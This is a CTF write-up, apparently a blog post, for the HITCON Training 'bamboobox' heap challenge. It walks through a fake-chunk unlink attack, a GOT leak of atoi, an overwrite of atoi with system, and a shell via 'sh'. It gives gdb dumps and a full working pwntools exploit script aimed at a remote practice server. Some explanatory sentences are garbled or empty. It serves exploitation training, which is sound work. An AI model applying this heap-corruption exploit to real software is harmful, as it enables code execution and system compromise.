Hittraining ﹣ bamboobox heap skill unlink

catalog

Utilization ideas

                   

  • Fake a free chunk.
  • Use unlink to move the chunk to the memory where the chunk pointer is stored.
  • Overwrite the address of the got table whose chunk 0 pointer is atoi and disclose it.
  • The got table covering atoi is the address of the system function.
  • Give the parameter 'sh', call the atoi function to get the shell.

Utilization process

add(0x40,'a' * 8)
add(0x80,'b' * 8)
add(0x80,'c' * 8)

ptr = 0x6020c8

fake_chunk = p64(0)
fake_chunk += p64(0x41)
fake_chunk += p64(ptr-0x18)
fake_chunk += p64(ptr-0x10)
fake_chunk += 'c'*0x20
fake_chunk += p64(0x40)
fake_chunk += p64(0x90)
edit(0,0x80,fake_chunk)

                          _ Size gives the size of fak chunk, and the inuse position of size is 0. When free chunk 1 is used, the program mistakenly assumes that fake chunk is idle, thus triggering the unlink operation and setting the ptr pointer to ptr-0x18.

gdb-peda$ x /20xg 0x250c020
0x250c020:	0x0000000000000000	0x0000000000000051 chunk 0
0x250c030:	0x0000000000000000	0x0000000000000041
0x250c040:	0x00000000006020b0	0x00000000006020b8
0x250c050:	0x6363636363636363	0x6363636363636363
0x250c060:	0x6363636363636363	0x6363636363636363
0x250c070:	0x0000000000000040	0x0000000000000090 chunk 1
0x250c080:	0x626262626262000a	0x000000000000000a
0x250c090:	0x0000000000000000	0x0000000000000000
0x250c0a0:	0x0000000000000000	0x0000000000000000
0x250c0b0:	0x0000000000000000	0x0000000000000000
remove(1)
payload = p64(0) * 2
payload += p64(0x40) + p64(0x602068)
edit(0,0x80,payload)

After chunk 1 is dropped by                     .

show()
r.recvuntil("0 : ")
atoi_addr = u64(r.recvuntil(":")[:6].ljust(8,'\x00'))
libcbase = atoi_addr - libc.symbols['atoi']
print "libc:",hex(libcbase) 
system_addr = libcbase + libc.symbols['system']
print 'system:',hex(system_addr)

Disclose the address of atoi function and calculate the address of system function.

edit(0,0x8,p64(system_addr))
r.recvuntil(":")
r.sendline("sh")

                          .

get flag

exp script

from pwn_debug import *

#context.log_level = 'debug'
pdbg = pwn_debug('bamboobox')
pdbg.local()
pdbg.remote('node3.buuoj.cn',26510)
#libc = ELF('./x64_libc.so.6')
r = pdbg.run('remote')
libc = pdbg.libc

def add(length,name):
	r.recvuntil(":")
	r.sendline('2')
	r.recvuntil(':')
	r.sendline(str(length))
	r.recvuntil(":")
	r.sendline(name)

def edit(idx,length,name):
	r.recvuntil(':')
	r.sendline('3')
	r.recvuntil(":")
	r.sendline(str(idx))
	r.recvuntil(":")
	r.sendline(str(length))
	r.recvuntil(':')
	r.sendline(name)

def remove(idx):
	r.recvuntil(":")
	r.sendline("4")
	r.recvuntil(":")
	r.sendline(str(idx))

def show():
	r.recvuntil(":")
	r.sendline("1")


add(0x40,'a' * 8)
add(0x80,'b' * 8)
add(0x80,'c' * 8)

ptr = 0x6020c8

fake_chunk = p64(0)
fake_chunk += p64(0x41)
fake_chunk += p64(ptr-0x18)
fake_chunk += p64(ptr-0x10)
fake_chunk += 'c'*0x20
fake_chunk += p64(0x40)
fake_chunk += p64(0x90)
edit(0,0x80,fake_chunk)

#gdb.attach(r)

remove(1)
payload = p64(0) * 2
payload += p64(0x40) + p64(0x602068)
edit(0,0x80,payload)

#gdb.attach(r)

show()
r.recvuntil("0 : ")
atoi_addr = u64(r.recvuntil(":")[:6].ljust(8,'\x00'))
libcbase = atoi_addr - libc.symbols['atoi']
print "libc:",hex(libcbase) 
system_addr = libcbase + libc.symbols['system']
print 'system:',hex(system_addr)

edit(0,0x8,p64(system_addr))
#gdb.attach(r)

r.recvuntil(":")
r.sendline("sh")
r.interactive()

Content source

https://github.com/bash-c/pwn_repo/blob/master/hitconTraining_bamboobox/bamboobox2.py

Tags: shell github

Posted on Sat, 16 May 2020 07:19:30 -0700 by herve